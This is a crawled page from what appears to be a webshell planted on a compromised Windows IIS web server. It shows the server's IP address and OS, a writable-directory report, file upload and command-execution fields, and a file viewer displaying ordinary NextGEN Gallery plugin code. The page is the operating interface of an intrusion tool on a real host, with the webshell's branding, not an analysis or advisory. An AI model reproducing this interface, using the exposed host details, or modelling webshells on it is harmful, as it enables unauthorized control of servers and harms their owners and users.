403Webshell
Server IP : 195.130.67.5  /  Your IP : 216.73.217.127
Web Server : Microsoft-IIS/10.0
System : Windows NT WEBSERVER1 10.0 build 17763 (Windows Server 2016) i586
User : IUSR ( 0)
PHP Version : 7.4.19
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /inetpub/wwwroot/engineering/wp-content/plugins/nextgen-gallery/src/Settings/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /inetpub/wwwroot/engineering/wp-content/plugins/nextgen-gallery/src/Settings/GlobalSettings.php
<?php

namespace Imagely\NGG\Settings;

use Imagely\NGG\Util\Serializable;

class GlobalSettings extends ManagerBase {

	public static $_instance = null;

	/**
	 * @return GlobalSettings
	 */
	public static function get_instance() {
		if ( \is_null( self::$_instance ) ) {
			self::$_instance = new GlobalSettings();
		}
		return self::$_instance;
	}

	public function save() {
		return \update_site_option( self::$option_name, $this->to_array() );
	}

	public function load() {
		$this->_options = \get_site_option( self::$option_name, $this->to_array() );

		if ( ! $this->_options ) {
			$this->_options = [];
		} elseif ( \is_string( $this->_options ) ) {
			$this->_options = Serializable::unserialize( $this->_options );
		}
	}

	public function destroy() {
		return \delete_site_option( self::$option_name );
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit